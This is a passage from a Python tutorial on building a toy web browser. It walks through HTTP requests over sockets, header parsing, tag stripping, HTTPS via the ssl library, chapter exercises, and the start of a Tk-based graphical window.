the same IP address corresponds to multiple host names and hosts
multiple websites (for example, example.com
and
example.org
). The Host
header tells the server
which of multiple websites you want. These websites basically require
the Host
header to function properly. Hosting multiple
domains on a single computer is very common. There are
lots of other headers one could send, but let’s stick to just
Host
for now.
Finally, after the headers comes a single blank line; that tells the
host that you are done with headers. So type a blank line into
telnet
(hit Enter twice after typing the two lines of
request above) and you should get a response from
example.org
.
The HTTP/1.0 standard is also known as RFC 1945. The HTTP/1.1
standard is RFC 2616,
so if you’re interested in Connection
and keep-alive, look
there.
The server’s response starts with this line:
HTTP/1.0 200 OK
That tells you that the host confirms that it, too, speaks
HTTP/1.0
, and that it found your request to be “OK” (which
has a numeric code of 200). You may be familiar with
404 Not Found
; that’s another numeric code and response, as
are 403 Forbidden
or 500 Server Error
. There
are lots of these codes,As any look at a flow chart
will show. and they have a pretty neat organization
scheme:The status text
like OK
can actually be anything and is just there for
humans, not for machines.
Note the genius of having two sets of error codes (400s and 500s), which tells you who is at fault, the server or the browser.More precisely, who the server thinks is at fault. You can find a full list of the different codes on Wikipedia, and new ones do get added here and there.
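That organization scheme boils down to the first digit of the code. Here is a tiny sketch of the idea (the category names are my own summary of the convention, not from any library):

```python
def status_category(code):
    # The first digit of an HTTP status code gives its category:
    # 2xx means success, 4xx blames the browser, 5xx blames the server.
    return {
        "1": "Informational",
        "2": "Success",
        "3": "Redirection",
        "4": "Client error",
        "5": "Server error",
    }[str(code)[0]]

print(status_category(200))  # Success
print(status_category(404))  # Client error
print(status_category(500))  # Server error
```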
After the 200 OK
line, the server sends its own headers.
When I did this, I got these headers (but yours will differ):
Age: 545933
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Feb 2019 16:49:28 GMT
Etag: "1541025663+gzip+ident"
Expires: Mon, 04 Mar 2019 16:49:28 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (sec/96EC)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1270
Connection: close
There is a lot here, about the information you are
requesting (Content-Type
, Content-Length
, and
Last-Modified
), about the server (Server
,
X-Cache
), about how long the browser should cache this
information (Cache-Control
, Expires
,
Etag
), about all sorts of other stuff. Let’s move on for
now.
After the headers there is a blank line followed by a bunch of HTML code.
This is called the body of the server’s response, and your
browser knows that it is HTML because of the Content-Type
header, which says that it is text/html
. It’s this HTML
code that contains the content of the web page itself.
Let’s now switch gears from manual connections to Python.
Many common (and uncommon) HTTP headers are described on Wikipedia.
So far we’ve communicated with another computer using
telnet
. But it turns out that telnet
is quite
a simple program, and we can do the same programmatically. It’ll require
extracting host name and path from the URL, creating a socket,
sending a request, and receiving a response.In Python, there’s a library
called urllib.parse
for parsing URLs, but I think
implementing our own will be good for learning. Plus, it makes this book
less Python-specific.
Let’s start with parsing the URL. I’m going to make parsing a URL
return a URL
object, and I’ll put the parsing code into the
constructor:
class URL:
def __init__(self, url):
# ...
The __init__
method is Python’s peculiar syntax for
class constructors, and the self
parameter, which you must
always make the first parameter of any method, is Python’s analog of
this
.
Let’s start with the scheme, which is separated from the rest of the
URL by ://
. Our browser only supports http
, so
I check that, too:
class URL:
def __init__(self, url):
self.scheme, url = url.split("://", 1)
assert self.scheme == "http", \
"Unknown scheme {}".format(self.scheme)
Now we must separate the host from the path. The host comes before the first /, while the path is that slash and everything after it. Let’s add code to the constructor that parses out the host and path:
class URL:
    def __init__(self, url):
        # ...
        if "/" not in url:
            url = url + "/"
        self.host, url = url.split("/", 1)
        self.path = "/" + url
(When you see a code block with a # ..., like this one, it means you’re adding code to an existing method or block.) The
split(s, n)
method splits a string at the first
n
copies of s
. Note that there’s some tricky
logic here for handling the slash between the host name and the path.
That (optional) slash is part of the path.
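To check that tricky logic, here is the parsing so far collected into one standalone recap (the same code as above, gathered into one place so you can run it on its own):

```python
class URL:
    def __init__(self, url):
        self.scheme, url = url.split("://", 1)
        assert self.scheme == "http", \
            "Unknown scheme {}".format(self.scheme)
        # If there's no slash, the path is just "/".
        if "/" not in url:
            url = url + "/"
        self.host, url = url.split("/", 1)
        self.path = "/" + url

u = URL("http://example.org/index.html")
print(u.host)  # example.org
print(u.path)  # /index.html
print(URL("http://example.org").path)  # / (the optional slash is added)
```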
Our browser will create a URL
object based on user
input, and then it will want to download the web page at that URL. We’ll
do that in a new method, request
:
class URL:
def request(self):
# ...
Note that you always need to write the self
parameter
for methods in Python. In the future, I won’t always make such a big
deal out of defining a method—if you see a code block with code in a
method or function that doesn’t exist yet, that means we’re defining
it.
The first step to downloading a web page is connecting to the host. The operating system provides a feature called “sockets” for this. When you want to talk to other computers (either to tell them something, or to wait for them to tell you something), you create a socket, and then that socket can be used to send information back and forth. Sockets come in a few different kinds, because there are multiple ways to talk to other computers:
A socket has an address family, which tells you how to find the other computer; address family names begin with AF. We want AF_INET, but for example AF_BLUETOOTH is another.
A socket has a type, which describes the sort of conversation that will take place; type names begin with SOCK. We want SOCK_STREAM, which means each computer can send arbitrary amounts of data over, but there’s also SOCK_DGRAM, in which case they send each other packets of some fixed size.The DGRAM stands for “datagram”; think of it like a postcard.
A socket has a protocol, which describes the steps by which the two computers establish a connection; we want IPPROTO_TCP.Newer versions of HTTP use something called QUIC instead of TCP, but our browser will stick to HTTP 1.0.
By picking all of these options, we can create a socket like so:While this code uses the Python socket library, your favorite language likely contains a very similar library. This API is basically standardized. In Python, the flags we pass are defaults, so you can actually call socket.socket(); I’m keeping the flags here in case you’re following along in another language.
import socket

class URL:
    def request(self):
        s = socket.socket(
            family=socket.AF_INET,
            type=socket.SOCK_STREAM,
            proto=socket.IPPROTO_TCP,
        )
Once you have a socket, you need to tell it to connect to the other computer. For that, you need the host and a port. The port depends on the type of server you’re connecting to; for now it should be 80.
class URL:
    def request(self):
        # ...
        s.connect((self.host, 80))
This talks to example.org
to set up the connection and
ready both computers to exchange data.
Naturally this won’t work if you’re offline. It also might not work if you’re behind a proxy, or in a variety of more complex networking environments. The workaround will depend on your setup—it might be as simple as disabling your proxy, or it could be much more complex.
Note that there are two parentheses in the connect
call:
connect
takes a single argument, and that argument is a
pair of a host and a port. This is because different address families
have different numbers of arguments.
You can find out more about the “sockets” API on Wikipedia. Python more or less implements that API directly.
Now that we have a connection, we make a request to the other server.
To do so, we send it some data using the send
method:
class URL:
    def request(self):
        # ...
        s.send(("GET {} HTTP/1.0\r\n".format(self.path) + \
                "Host: {}\r\n\r\n".format(self.host)) \
            .encode("utf8"))
There are a few things to note here that have to be exactly right.
First, it’s very important to use \r\n
instead of
\n
for newlines. It’s also essential that you put
two newlines \r\n
at the end, so that you send
that blank line at the end of the request. If you forget that, the other
computer will keep waiting on you to send that newline, and you’ll keep
waiting on its response.Computers are endlessly literal-minded.
Also note the encode
call. When you send data, it’s
important to remember that you are sending raw bits and bytes; they
could form text or an image or video. But a Python string is
specifically for representing text. The encode
method
converts text into bytes, and there’s a corresponding
decode
method that goes the other way.When you call
encode
and decode
you need to tell the
computer what character encoding you want it to use. This is a
complicated topic. I’m using utf8
here, which is a common
character encoding and will work on many pages, but in the real world
you would need to be more careful. Python reminds you to
be careful by giving different types to text and to bytes:
>>> type("text")
<class 'str'>
>>> type("text".encode("utf8"))
<class 'bytes'>
If you see an error about str
versus bytes
,
it’s because you forgot to call encode
or
decode
somewhere.
Finally, send
just sends the request to the server.send
actually
returns a number, in this case 47
. That tells you how many
bytes of data you sent to the other computer; if, say, your network
connection failed midway through sending the data, you might want to
know how much you sent before the connection failed. To
read its response, you’d generally use the read
function on
sockets, which gives whatever bits of the response have already arrived.
Then you write a loop that collects bits of the response as they arrive.
However, in Python you can use the makefile
helper
function, which hides the loop:If you’re in another language, you might only have
socket.read
available. You’ll need to write the loop,
checking the socket status, yourself.
class URL:
    def request(self):
        # ...
        response = s.makefile("r", encoding="utf8", newline="\r\n")
Here makefile
returns a file-like object containing
every byte we receive from the server. I am instructing Python to turn
those bytes into a string using the utf8
encoding,
or method of associating bytes to letters.Hard-coding utf8
is not correct, but it’s a shortcut that will work alright on most
English-language websites. In fact, the Content-Type
header
usually contains a charset
declaration that specifies
encoding of the body. If it’s absent, browsers still won’t default to
utf8
; they’ll guess, based on letter frequencies, and you
see ugly � strange áççêñ£ß when they guess wrong. Incorrect-but-common
utf8
skips all that complexity. I’m also
informing Python of HTTP’s weird line endings.
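If you do want to honor the charset declaration, the parsing itself is straightforward. Here is a hedged sketch (a helper I’m inventing for illustration; it isn’t part of our browser, which hard-codes utf8):

```python
def charset_from_content_type(value, default="utf8"):
    # A Content-Type value looks like "text/html; charset=UTF-8".
    # Parameters follow the media type, separated by semicolons.
    for param in value.split(";")[1:]:
        param = param.strip()
        if param.lower().startswith("charset="):
            return param.split("=", 1)[1].strip()
    return default

print(charset_from_content_type("text/html; charset=UTF-8"))  # UTF-8
print(charset_from_content_type("text/html"))                 # utf8
```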
Let’s now split the response into pieces. The first line is the status line:
class URL:
    def request(self):
        # ...
        statusline = response.readline()
        version, status, explanation = statusline.split(" ", 2)
        assert status == "200", "{}: {}".format(status, explanation)
Note that I do not check that the server’s version of HTTP is the same as mine; this might sound like a good idea, but there are a lot of misconfigured servers out there that respond in HTTP 1.1 even when you talk to them in HTTP 1.0.Luckily the protocols are similar enough to not cause confusion.
After the status line come the headers:
class URL:
    def request(self):
        # ...
        headers = {}
        while True:
            line = response.readline()
            if line == "\r\n": break
            header, value = line.split(":", 1)
            headers[header.lower()] = value.strip()
For the headers, I split each line at the first colon and fill in a map of header names to header values. Headers are case-insensitive, so I normalize them to lower case. Also, white-space is insignificant in HTTP header values, so I strip off extra whitespace at the beginning and end.
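You can see that normalization at work on a couple of sample lines. This standalone helper uses the same split-and-strip logic as the loop above (it’s for demonstration only, not part of the browser):

```python
def parse_header_line(line):
    # Split at the first colon only, since values may contain colons;
    # lowercase the name and strip whitespace from the value.
    header, value = line.split(":", 1)
    return header.lower(), value.strip()

print(parse_header_line("Content-Type: text/html; charset=UTF-8\r\n"))
print(parse_header_line("HOST:   example.org  \r\n"))
```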
Headers can describe all sorts of information, but a couple of headers are especially important because they tell us that the data we’re trying to access is being sent in an unusual way. Let’s make sure none of those are present:The “compression” exercise at the end of this chapter describes how your browser should handle these headers if they are present.
class URL:
def request(self):
# ...
assert "transfer-encoding" not in headers
assert "content-encoding" not in headers
The usual way to send the data, then, is everything after the headers:
class URL:
    def request(self):
        # ...
        body = response.read()
        s.close()
It’s that body that we’re going to display, so let’s return that. Let’s also return the headers, in case they are useful to someone:
class URL:
def request(self):
# ...
return headers, body
Now let’s actually display the text in the response body.
The Content-Encoding
header lets the server compress web pages before sending them. Large,
text-heavy web pages compress well, and as a result the page loads
faster. The browser needs to send an Accept-Encoding
header in its request to list compression algorithms it supports. Transfer-Encoding
is similar and also allows the data to be “chunked”, which many servers
seem to use together with compression.
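To get a feel for what Content-Encoding: gzip does to a response body, here is a round trip using Python’s standard gzip module (a standalone demo; the actual exercise also involves sending an Accept-Encoding header and handling chunked transfers):

```python
import gzip

# A repetitive, text-heavy body, like much real HTML.
body = b"<html>" + b"text-heavy pages compress well " * 100 + b"</html>"
compressed = gzip.compress(body)

# The compressed form is much smaller than the original.
print(len(body), len(compressed))

# Decompressing recovers the body exactly.
assert gzip.decompress(compressed) == body
```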
The HTML code in the body defines the content you see in your browser window when you go to http://example.org/index.html. I’ll be talking much, much more about HTML in future chapters, but for now let me keep it very simple.
In HTML, there are tags and text. Each tag starts
with a <
and ends with a >
; generally
speaking, tags tell you what kind of thing some content is, while text
is the actual content.That said, some tags, like img
, are content,
not information about it. Most tags come in pairs of a
start and an end tag; for example, the title of the page is enclosed in
a pair of tags: <title>
and
</title>
. Each tag, inside the angle brackets, has a
tag name (like title
here), and then optionally a space
followed by attributes, and its pair has a /
followed by the tag name (and no attributes). Some tags do not have
pairs, because they don’t surround text, they just carry information.
For example, on http://example.org/index.html, there is the tag:
<meta charset="utf-8" />
This tag explains that the character set with which to interpret the
page body is utf-8
. Sometimes, tags that don’t contain
information end in a slash, but not always; it’s a matter of
preference.
The most important HTML tag is called <body>
(with
its pair, </body>
). Between these tags is the content
of the page; outside of these tags is various information about the
page, like the aforementioned title, information about how the page
should look (<style>
and
</style>
), and metadata (the aforementioned
<meta>
tag).
So, to create our very, very simple web browser, let’s take the page
HTML and print all the text, but not the tags, in it:If this example causes Python
to produce a SyntaxError
pointing to the end
on the last line, it is likely because you are running Python 2 instead
of Python 3. These chapters assume Python 3.
in_angle = False
for c in body:
    if c == "<":
        in_angle = True
    elif c == ">":
        in_angle = False
    elif not in_angle:
        print(c, end="")
This code is pretty complex. It goes through the request body
character by character, and it has two states: in_angle
,
when it is currently between a pair of angle brackets, and
not in_angle
. When the current character is an angle
bracket, it changes between those states; normal characters not inside a tag are printed.The
end
argument tells Python not to print a newline after the
character, which it otherwise would.
Let’s put this code into a new function, show
:
def show(body):
# ...
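If you’d rather test this tag-stripping logic without printing, the same two-state scan can collect characters into a string instead (a variant for experimentation, not the book’s show function):

```python
def strip_tags(body):
    # Same state machine as show: skip everything between < and >,
    # collect everything else.
    out = []
    in_angle = False
    for c in body:
        if c == "<":
            in_angle = True
        elif c == ">":
            in_angle = False
        elif not in_angle:
            out.append(c)
    return "".join(out)

print(strip_tags("<b>Hello</b>, <i>world</i>!"))  # Hello, world!
```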
We can now load a web page just by stringing together
request
and show
:
def load(url):
    headers, body = url.request()
    show(body)
Add the following code to run load
from the command
line:
if __name__ == "__main__":
    import sys
    load(URL(sys.argv[1]))
This is Python’s version of a main
function—it reads the
first argument (sys.argv[1]
) from the command line and uses
it as a URL. Try running this code on the URL
http://example.org/
:
python3 browser.py http://example.org/
You should see some short text welcoming you to the official example web page. You can also try using it on this chapter!
So far, our browser supports the http
scheme. That’s
pretty good: it’s the most common scheme on the web today. But more and
more, websites are migrating to the https
scheme. I’d like
this toy browser to support https
because many websites
today require it.
The difference between http
and https
is
that https
is more secure—but let’s be a little more
specific. The https
scheme, or more formally HTTP over TLS,
is identical to the normal http
scheme, except that all
communication between the browser and the host is encrypted. There are
quite a few details to how this works: which encryption algorithms are
used, how a common encryption key is agreed to, and of course how to
make sure that the browser is connecting to the correct host.
Luckily, the Python ssl
library implements all of these
details for us, so making an encrypted connection is almost as easy as
making a regular connection. That ease of use comes with accepting some
default settings which could be inappropriate for some situations, but
for teaching purposes they are fine.
Making an encrypted connection with ssl
is pretty easy.
Suppose you’ve already created a socket, s
, and connected
it to example.org
. To encrypt the connection, you use
ssl.create_default_context
to create a context
ctx
and use that context to wrap the socket
s
. That produces a new socket, s
:
import ssl
ctx = ssl.create_default_context()
s = ctx.wrap_socket(s, server_hostname=host)
When you wrap s
, you pass a server_hostname
argument, and it should match the Host
header. Note that I
save the new socket back into the s
variable. That’s
because you don’t want to send over the original socket; it would be
unencrypted and also confusing.
On macOS, you’ll need to run
a program called “Install Certificates” before you can use Python’s
ssl
package on most websites.
Let’s try to take this code and add it to request
.
First, we need to detect which scheme is being used:
class URL:
def __init__(self, url):
self.scheme, url = url.split("://", 1)
assert self.scheme in ["http", "https"], \
"Unknown scheme {}".format(self.scheme)
# ...
(Note that here you’re supposed to replace the existing scheme parsing code with this new code. It’s usually clear from context and the code itself what you need to replace.)
Encrypted HTTP connections usually use port 443 instead of port 80:
class URL:
def __init__(self, url):
# ...
if self.scheme == "http":
self.port = 80
elif self.scheme == "https":
self.port = 443
We can use that port when creating the socket:
class URL:
    def request(self):
        # ...
        s.connect((self.host, self.port))
        # ...
Next, we’ll wrap the socket with the ssl
library:
class URL:
    def request(self):
        # ...
        if self.scheme == "https":
            ctx = ssl.create_default_context()
            s = ctx.wrap_socket(s, server_hostname=self.host)
        # ...
Your browser should now be able to connect to HTTPS sites.
While we’re at it, let’s add support for custom ports, which are specified in a URL by putting a colon after the host name:
http://example.org:8080/index.html
If the URL has a port we can parse it out and use it:
class URL:
def __init__(self, url):
# ...
if ":" in self.host:
self.host, port = self.host.split(":", 1)
self.port = int(port)
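Putting the scheme, port, host, and path parsing together, a standalone recap of the constructor (mirroring the code above, runnable on its own) behaves like this:

```python
class URL:
    def __init__(self, url):
        self.scheme, url = url.split("://", 1)
        assert self.scheme in ["http", "https"]
        # Default ports for each scheme.
        if self.scheme == "http":
            self.port = 80
        elif self.scheme == "https":
            self.port = 443
        if "/" not in url:
            url = url + "/"
        self.host, url = url.split("/", 1)
        self.path = "/" + url
        # A colon in the host means a custom port was given.
        if ":" in self.host:
            self.host, port = self.host.split(":", 1)
            self.port = int(port)

u = URL("http://example.org:8080/index.html")
print(u.host, u.port, u.path)  # example.org 8080 /index.html
print(URL("https://example.org/").port)  # 443
```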
Custom ports are handy for debugging. Python has a built-in web server you can use to serve files on your computer. For example, if you run
python3 -m http.server 8000
from some directory, then going to
http://localhost:8000/
should show you all the files in
that directory. This is going to be a good way to test your browser.
TLS is pretty complicated. You can read the details in RFC 8446, but implementing your own is not recommended. It’s very difficult to write a custom TLS implementation that is not only correct but secure.
This chapter went from an empty file to a rudimentary web browser that can connect to a host using the sockets and ssl libraries and send an HTTP request including a Host header.Yes, this is still more of a command-line tool than a web browser, but it already has some of the core capabilities of a browser.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
    def __init__(url)
    def request()
def show(body)
def load(url)
if __name__ == "__main__"
Alternate encodings: add support for a non-utf8
value for Content-Type
. Test it on a real site such as
google.com
(which doesn’t use utf8
).
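As a starting point, here is a hedged sketch of pulling the charset out of a Content-Type header value; the helper name charset_of and the utf8 fallback are assumptions for illustration, not part of the chapter's code.

```python
# Sketch for the alternate-encodings exercise: extract the charset
# parameter from a Content-Type header value. The helper name and
# the utf8 fallback are assumptions.
def charset_of(content_type):
    for part in content_type.split(";")[1:]:
        key, _, value = part.strip().partition("=")
        if key.casefold() == "charset":
            return value.strip('"').lower()
    return "utf8"  # fall back to the encoding the browser already uses
```

You would then pass the result as the encoding argument when decoding the response body.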
HTTP/1.1: Along with Host
, send the
Connection
header in the request
function with
the value close
. Your browser can now declare that it is
using HTTP/1.1
. Also add a User-Agent
header.
Its value can be whatever you want—it identifies your browser to the
host. Make it easy to add further headers in the future.
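One way to make headers easy to extend, sketched here under the assumption that you build the request string in one place: keep the headers in a dict and loop over it. The function name build_request and the User-Agent string are made up for this example.

```python
# Sketch for the HTTP/1.1 exercise: assemble the request from a dict
# so adding another header later is a one-line change.
def build_request(host, path, extra_headers=None):
    headers = {
        "Host": host,
        "Connection": "close",
        "User-Agent": "toy-browser/0.1",  # any value identifies your browser
    }
    if extra_headers:
        headers.update(extra_headers)
    request = "GET {} HTTP/1.1\r\n".format(path)
    for name, value in headers.items():
        request += "{}: {}\r\n".format(name, value)
    request += "\r\n"  # blank line ends the header block
    return request
```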
File URLs: Add support for the file
scheme,
which allows the browser to open local files. For example,
file:///path/goes/here
should refer to the file on your
computer at location /path/goes/here
. Also make it so that,
if your browser is started without a URL being given, some specific file
on your computer is opened. You can use that file for quick testing.
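The core of the file scheme is just stripping the prefix and reading the file. This sketch assumes a POSIX-style path as in the example above; request_file is a hypothetical helper name.

```python
# Sketch for the file-URL exercise: given file:///path/goes/here,
# strip the scheme and read the local file as utf8 text.
def request_file(url):
    assert url.startswith("file://")
    path = url[len("file://"):]
    with open(path, encoding="utf8") as f:
        return f.read()
```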
data: Yet another scheme is data, which allows
inlining HTML content into the URL itself. Try navigating to
data:text/html,Hello world!
in a real browser to see what
happens. Add support for this scheme to your browser. The data
scheme is especially convenient for making tests without having to put
them in separate files.
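A minimal sketch of parsing such a URL, handling only the simple unencoded form data:mediatype,content shown above (no base64, no parameters); parse_data_url is a name invented for this example.

```python
# Sketch for the data-scheme exercise: split off the media type and
# return the inline content.
def parse_data_url(url):
    assert url.startswith("data:")
    rest = url[len("data:"):]
    mediatype, _, content = rest.partition(",")
    return mediatype, content
```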
Body tag: Only show text in an HTML document if it is
between <body>
and </body>
. This
avoids printing the title and style information. Try to do this in a
single pass through the document—that means not using string methods
like split
or similar. The loop in show
will
need more variables to track tag names.
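One possible shape for that single-pass loop, sketched as a standalone function (the real exercise modifies show); the variable names are assumptions.

```python
# Sketch for the body-tag exercise: track the current tag name in one
# pass and only emit characters between <body> and </body>.
def show_body(body):
    out = ""
    in_tag = False
    tag = ""
    in_body = False
    for c in body:
        if c == "<":
            in_tag = True
            tag = ""
        elif c == ">":
            in_tag = False
            # First word of the tag is its name; attributes are ignored.
            name = tag.split()[0].casefold() if tag.split() else ""
            if name == "body": in_body = True
            elif name == "/body": in_body = False
        elif in_tag:
            tag += c
        elif in_body:
            out += c
    return out
```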
Entities: Implement support for the less-than
(<
) and greater-than (>
)
entities. These should be printed as <
and
>
, respectively. For example, if the HTML response was
<div>
, the show
method of your
browser should print <div>
. Entities allow web pages
to include these special characters without the browser interpreting
them as tags.
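A sketch of one way to do it, scanning the text with an index so a four-character entity can be consumed at once; the function name and structure are assumptions, not the book's solution.

```python
# Sketch for the entities exercise: print &lt; and &gt; as < and >,
# while still skipping real tags.
def show_entities(body):
    out = ""
    in_tag = False
    i = 0
    while i < len(body):
        c = body[i]
        if c == "<":
            in_tag = True
        elif c == ">":
            in_tag = False
        elif not in_tag:
            if body.startswith("&lt;", i):
                out += "<"; i += 4; continue
            elif body.startswith("&gt;", i):
                out += ">"; i += 4; continue
            else:
                out += c
        i += 1
    return out
```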
view-source: In addition to HTTP and HTTPS, there are other
schemes, such as view-source; navigating in a real browser to
view-source:http://browser.engineering/http.html
shows the
HTML source of this chapter rather than its rendered output. Add support
for the view-source scheme. Your browser should print the entire HTML
file as if it was text. Hint: To do so, you can utilize the
entities from the previous exercise, and add an extra
transform()
method that adjusts the input to
show()
when in view-source mode, like this:
show(transform(body))
.
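Under the assumption that you've completed the entities exercise, transform can be as small as escaping the two characters that show treats specially:

```python
# Sketch of the transform() helper from the hint: escape < and > so
# show() (with entity support) prints the source as plain text.
def transform(body):
    return body.replace("<", "&lt;").replace(">", "&gt;")
```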
Compression: Add support for HTTP compression, in which the
browser informs
the server that compressed data is acceptable. Your browser must
send the Accept-Encoding
header with the value
gzip
. If the server supports compression, its response will
have a Content-Encoding
header with value
gzip
. The body is then compressed. Add support for this
case. To decompress the data, you can use the decompress
method in the gzip
module. Calling makefile
with the encoding
argument will no longer work, because
compressed data is not utf8
-encoded. You can change the
first argument to "rb"
to work with raw bytes instead of
encoded text. Most web servers send compressed data in a
Transfer-Encoding
called chunked
.
You’ll need to add support for that, too, to access most web servers
that support compressed data.There are also a couple of Transfer-Encoding
s
that compress the data. Those aren’t commonly used.
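The two halves of this exercise can be sketched separately: reassembling a chunked body, then decompressing it. This is an illustrative sketch, not the book's solution; dechunk and decompress_body are invented names.

```python
import gzip

# Sketch for the compression exercise. A chunked body is a series of
# hex-length lines, each followed by that many bytes and \r\n, ending
# with a zero-length chunk.
def dechunk(raw):
    out = b""
    while raw:
        line, raw = raw.split(b"\r\n", 1)
        length = int(line, 16)
        if length == 0: break
        out += raw[:length]
        raw = raw[length + 2:]  # skip the chunk data and trailing \r\n
    return out

def decompress_body(raw, chunked=False):
    if chunked:
        raw = dechunk(raw)
    return gzip.decompress(raw)
```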
Redirects: Error codes in the 300 range request a redirect.
When your browser encounters one, it should make a new request to the
URL given in the Location
header. Sometimes the
Location
header is a full URL, but sometimes it skips the
host and scheme and just starts with a /
(meaning the same
host and scheme as the original request). The new URL might itself be a
redirect, so make sure to handle that case. You don’t, however, want to
get stuck in a redirect loop, so make sure to limit how many redirects your
browser can follow in a row. You can test this with the URL http://browser.engineering/redirect, which redirects
back to this page.
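One piece of this exercise, resolving the Location header, can be sketched like so; resolve_location and MAX_REDIRECTS are names invented for illustration. In request you would then loop while the status code is in the 300s, at most MAX_REDIRECTS times.

```python
# Sketch for the redirects exercise: a Location that starts with "/"
# keeps the original scheme and host; otherwise it is a full URL.
MAX_REDIRECTS = 5

def resolve_location(location, scheme, host):
    if location.startswith("/"):
        return "{}://{}{}".format(scheme, host, location)
    return location
```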
Caching: Typically the same images, styles, and scripts are
used on multiple pages; downloading them repeatedly is a waste. It’s
generally valid to cache any HTTP response, as long as it was requested
with GET
and received a 200
response.Some other status codes like
301
and 404
can also be cached.
Implement a cache in your browser and test it by requesting the same
file multiple times. Servers control caches using the
Cache-Control
header. Add support for this header,
specifically for no-store
and max-age
values.
If the Cache-Control
header contains any other value than
these two, it's best not to cache the response.
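A minimal cache honoring those two directives might look like this sketch; the Cache class and its method names are assumptions, and the now parameter exists only to make the expiry logic easy to test.

```python
import time

# Sketch for the caching exercise: cache bodies keyed by URL, honoring
# no-store and max-age from Cache-Control. Anything unrecognized is
# conservatively not cached.
class Cache:
    def __init__(self):
        self.entries = {}  # url -> (expiry time, body)

    def store(self, url, cache_control, body, now=None):
        now = now if now is not None else time.time()
        if cache_control is None: return
        directive = cache_control.strip().lower()
        if directive.startswith("max-age="):
            try:
                age = int(directive[len("max-age="):])
            except ValueError:
                return
            self.entries[url] = (now + age, body)
        # no-store, or any other value: don't cache

    def get(self, url, now=None):
        now = now if now is not None else time.time()
        entry = self.entries.get(url)
        if entry and now < entry[0]:
            return entry[1]
        return None
```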
A web browser doesn’t just download a web page; it also has to show
that page to the user. In the 21st century, that means a
graphical application. How does that work? In this chapter we’ll equip
the toy browser with a graphical user interface.There are some obscure
text-based browsers: I used w3m
as my main browser for most
of 2011. I don’t anymore.
Desktop and laptop computers run operating systems that provide desktop environments: windows, buttons, and a mouse. Programs don't draw directly to the screen; the desktop environment controls the screen, so a program instead asks it for a window and draws into that window.
Though the desktop environment is responsible for displaying the window, the program is responsible for drawing its contents. Applications have to redraw these contents quickly for interactions to feel fluid,On older systems, applications drew directly to the screen, and if they didn’t update, whatever was there last would stay in place, which is why in error conditions you’d often have one window leave “trails” on another. Modern systems use a technique called compositing, in part to avoid trails (performance and application isolation are additional reasons). Even while using compositing, applications must redraw their window contents to change what is displayed. Chapter 13 will discuss compositing in more detail. and must respond quickly to clicks and key presses so the user doesn’t get frustrated.
“Feel fluid” can be made more precise. Graphical applications such as browsers typically aim to redraw at the refresh rate, or frame rate, of the screen, commonly 60Hz.Most screens today have a refresh rate of 60Hz, and that is generally considered fast enough to look smooth. However, new hardware is increasingly appearing with higher refresh rates, such as 120Hz. Sometimes rendering engines, games in particular, refresh at lower rates on purpose if they know the rendering speed can’t keep up. This means that the browser has to finish all its work in less than 1/60th of a second, or about 16ms, in order to keep up. For this reason, 16ms is called the animation frame budget of the application.
You should also keep in mind that not all web page interactions are animations; there are also discrete actions such as mouse clicks. Research has shown that it usually suffices to respond to a discrete action within 100ms; below that threshold, most humans are not sensitive to discrete action speed. This is very different from interactions such as scrolling, where anything slower than 60Hz or so is quite noticeable. The difference has to do with the way the human mind processes movement (animation) versus discrete actions, and the time it takes the brain to decide upon such an action, execute it, and understand its result.
Doing all of this by hand is a bit of a drag, so programs usually use a graphical toolkit to simplify these steps. These toolkits allow you to describe your program’s window in terms of widgets like buttons, tabs, or text boxes, and take care of drawing and redrawing the window contents to match that description.
Python comes with a graphical toolkit called Tk using the Python
package tkinter
.The library is called Tk, and it was originally written for
a different language called Tcl. Python contains an interface to it,
hence the name. Using it is quite simple:
import tkinter

window = tkinter.Tk()
tkinter.mainloop()
Here tkinter.Tk()
creates a window and
tkinter.mainloop()
starts the process of redrawing the
screen. Inside Tk, tkinter.Tk()
asks the desktop
environment to create the window and returns its identifier, while
tkinter.mainloop()
enters a loop that looks similar to this
The example event loop
above may look like an infinite loop that locks up the computer, but
it’s not, because of preemptive multitasking among threads and processes
and/or a variant of the event loop that sleeps unless it has inputs that
wake it up from another thread or process.:
while True:
    for evt in pendingEvents():
        handleEvent(evt)
    drawScreen()
Here, drawScreen
draws the various widgets,
pendingEvents
asks the desktop environment for recent mouse
clicks or key presses, and handleEvent
calls back into user code in response to that event. This event loop pattern is
common in many applications, from web browsers to video games. A simple
window does not need much event handling (it ignores all events) or much
drawing (it is a uniform white or gray). But in more complex graphical
applications the event loop pattern makes sure that all events are
eventually handled and the screen is eventually updated, both essential
to a good user experience.
Tk’s event loop is the Tk_UpdateObjCmd
function, found
in tkCmds.c
,
which calls XSync
to redraw the screen and
Tcl_DoOneEvent
to handle an event. There’s also a lot of
code to handle errors.
Our toy browser will draw the web page text to a canvas, a
rectangular Tk widget that you can draw circles, lines, and text
in.You may be familiar
with the HTML <canvas>
element, which is a similar
idea: a 2D rectangle in which you can draw shapes. Tk also
has widgets like buttons and dialog boxes, but our browser won’t use
them: we will need finer-grained control over appearance, which a canvas
provides:This is why
desktop applications are more uniform than web pages: desktop
applications generally use the widgets provided by a common graphical
toolkit, which limits their creative possibilities.
WIDTH, HEIGHT = 800, 600

window = tkinter.Tk()
canvas = tkinter.Canvas(window, width=WIDTH, height=HEIGHT)
canvas.pack()
The first line creates the window, as above; the second creates the
Canvas
inside that window. We pass the window as an
argument, so that Tk knows where to display the canvas, and some
arguments that define the canvas’s size; I chose 800×600 because that
was a common old-timey monitor size.This size, called Super Video Graphics Array, was
standardized in 1987, and probably did seem super back
then. The third line is a Tk peculiarity, which positions
the canvas inside the window.
There’s going to be a window, a canvas, and later some other things, so to keep it all organized let’s make an object:
class Browser:
    def __init__(self):
        self.window = tkinter.Tk()
        self.canvas = tkinter.Canvas(
            self.window,
            width=WIDTH,
            height=HEIGHT
        )
        self.canvas.pack()
Once you’ve made a canvas, you can call methods that draw shapes on
the canvas. Let’s do that inside load
, which we’ll move
into the new Browser
class:
class Browser:
    def load(self, url):
        # ...
        self.canvas.create_rectangle(10, 20, 400, 300)
        self.canvas.create_oval(100, 100, 150, 150)
        self.canvas.create_text(200, 150, text="Hi!")
To run this code, create a Browser
, call
load
, and then start the Tk mainloop
:
if __name__ == "__main__":
    import sys
    Browser().load(URL(sys.argv[1]))
    tkinter.mainloop()
